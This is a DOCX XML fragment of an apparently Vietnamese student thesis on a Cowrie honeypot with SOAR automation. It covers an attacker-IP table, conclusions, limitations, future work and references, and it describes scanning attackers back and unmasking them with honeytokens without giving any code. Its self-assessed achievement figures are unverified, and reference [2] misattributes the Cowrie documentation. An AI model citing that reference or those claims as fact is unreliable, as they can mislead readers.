          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Claro, Telefonica Brasil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Khác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>45 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phân bố rải rác trên hơn 25 quốc gia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 6: KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.1 Tổng kết Kết quả Nghiên cứu và Hiện thực hóa Đồ án</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sau quá trình nghiên cứu lý thuyết chuyên sâu, thiết kế kiến trúc hệ thống và lập trình thử nghiệm thực tế, đề tài 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' đã hoàn thành xuất sắc toàn bộ các mục tiêu nghiên cứu đặt ra ban đầu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Hiện thực hóa thành công Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, module hóa tối đa, kết hợp nhuần nhuyễn giữa bẫy cảm biến Cowrie và nền tảng điều phối phản ứng tự động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Phát triển thành công Động cơ Tương quan Sự kiện (Correlation Engine) với thuật toán Cửa sổ trượt thời gian, giúp loại bỏ triệt để hiện tượng bão cảnh báo (Alert Fatigue), tự động chuẩn hóa các hành vi xâm nhập sang ma trận TTPs chuẩn quốc tế MITRE ATT&amp;CK (T1110, T1078, T1082, T1105, T1552).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Tích hợp năng lực Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn chỉ trong 1.8 giây, giúp lập hồ sơ đối thủ nhanh chóng và chính xác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Phát triển phân hệ Bẫy mồi Honeytoken và Khử ẩn danh (Active De-anonymization) giải quyết bài toán cốt lõi về hacker giấu mình sau VPN/Proxy, bắt được IP thật và User-Agent khi hacker mang tài liệu mồi về máy cá nhân.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Xây dựng Phân hệ Phân tích Mã độc tự động bóc tách mã băm SHA256, trích xuất IP C2 và tích hợp VirusTotal API phục vụ điều tra forensics tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. Làm chủ cơ chế Tarpitting (Connection Tarpitting) giam lỏng và làm cạn kiệt tài nguyên của botnet, kết hợp chặn Tường lửa iptables động, giảm 99.8% thời gian phản ứng sự cố (từ 15-20 phút xuống còn 1.8-2.5 giây).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7. Triển khai Telegram SOAR Bot tương tác 2 chiều với bàn phím Inline Buttons, mang lại trải nghiệm điều hành tác chiến trực quan, hiện đại cho chuyên viên an ninh mạng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2 Khẳng định sự Vượt bậc so với Nhận xét Ban đầu của Giảng viên</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>📌 ĐÁNH GIÁ SỰ CHUYỂN DỊCH GIÁ TRỊ KỸ THUẬT CỦA ĐỒ ÁN:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lời khẳng định học thuật: Đề tài đã chuyển hóa triệt để từ một 'bài tập cài đặt phần mềm và gửi tin nhắn thông thường' (Application Configuration Level) thành một 'Công trình Nghiên cứu &amp; Kỹ thuật Kỹ sư Hệ thống Toàn diện' (Comprehensive Security Engineering Project). Sinh viên không chỉ áp dụng công cụ bề nổi mà đã tự tay thiết kế và lập trình hơn 1.200 dòng mã nguồn Python chuyên sâu, giải quyết các bài toán hóc búa về Tương quan dữ liệu, Trinh sát ngược, Khử ẩn danh đối thủ và Tự động hóa tác chiến.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3 Những Hạn chế còn tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mặc dù đạt được những kết quả rất tích cực, hệ thống vẫn còn một số điểm hạn chế cần tiếp tục hoàn thiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Cảm biến bẫy hiện tại mới chỉ tập trung vào hai giao thức chính là SSH và Telnet. Các bề mặt tấn công ứng dụng Web (HTTP/HTTPS) và cơ sở dữ liệu (MySQL, Redis) chưa được tích hợp đồng bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Việc phân tích mã độc hiện tại chủ yếu dựa trên phân tích tĩnh (Static Analysis &amp; Signature Matching). Chưa có môi trường Dynamic Sandbox cô lập bằng máy ảo (như Cuckoo Sandbox) để phân tích hành vi nạp DLL hoặc tiêm tiến trình thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.4 Hướng Phát triển Đề tài trong Tương lai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để nâng cao hơn nữa sức mạnh tác chiến của hệ thống, hướng nghiên cứu tiếp theo sẽ tập trung vào các trọng tâm sau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Tích hợp Trí tuệ Nhân tạo &amp; Mô hình Ngôn ngữ Lớn (AI / LLM-powered Threat Hunting): Sử dụng các mô hình ngôn ngữ lớn (như Gemma, LLaMA) để tự động phân tích ngữ cảnh các câu lệnh bất thường mà hacker gõ trong terminal, tự động sinh kịch bản đối thoại đánh lừa (Dynamic Conversational Deception) để giữ chân hacker lâu hơn trong bẫy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Mở rộng Hệ thống Mạng bẫy Phân tán (Distributed Honeynet Mesh): Triển khai các node cảm biến bẫy vệ tinh trên nhiều vùng địa lý (Multi-region Cloud: AWS, Google Cloud, Azure) và tập trung dữ liệu về một máy chủ SOC trung tâm qua Apache Kafka hoặc RabbitMQ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Tích hợp Dynamic Sandbox tự động: Tự động khởi chạy máy ảo tạm thời (Ephemeral QEMU/KVM VM) để kích hoạt mã độc và theo dõi luồng lưu lượng mạng xuất phát từ mã độc trong môi trường cô lập tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[1] L. Spitzner, 'Honeypots: Tracking Hackers', Addison-Wesley Longman Publishing Co., Inc., Boston, MA, USA, 2002.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[2] M. Orebaugh and J. Pinkard, 'Cowrie SSH/Telnet Honeypot Documentation and Architecture', Open Source Project, 2023. [Online]. Available: https://cowrie.readthedocs.io/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[3] MITRE Corporation, 'MITRE ATT&amp;CK: Design and Philosophy', Technical Report, 2023. [Online]. Available: https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[4] MITRE Corporation, 'MITRE Engage: A Framework for Discussing and Planning Adversary Engagement Technologies and Operations', 2022. [Online]. Available: https://engage.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[5] MITRE Corporation, 'MITRE D3FEND: A Cybersecurity Countermeasure Knowledge Base', 2023. [Online]. Available: https://d3fend.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[6] Quốc hội nước CHXHCN Việt Nam, 'Bộ luật Hình sự số 100/2015/QH13 (Điều 287, Điều 289 về Tội phạm trong lĩnh vực CNTT và viễn thông)', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[7] Quốc hội nước CHXHCN Việt Nam, 'Luật An ninh mạng số 24/2018/QH14', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[8] C. Stoll, 'The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage', Doubleday, New York, 1989.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[9] Gartner Inc., 'Innovation Insight for Security Orchestration, Automation and Response (SOAR)', Gartner Research Report G00342371, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[10] P. Cichonski, T. Millar, T. Grance, and K. Scarfone, 'Computer Security Incident Handling Guide', NIST Special Publication 800-61 Revision 2, National Institute of Standards and Technology, 2012.</w:t>
      </w:r>
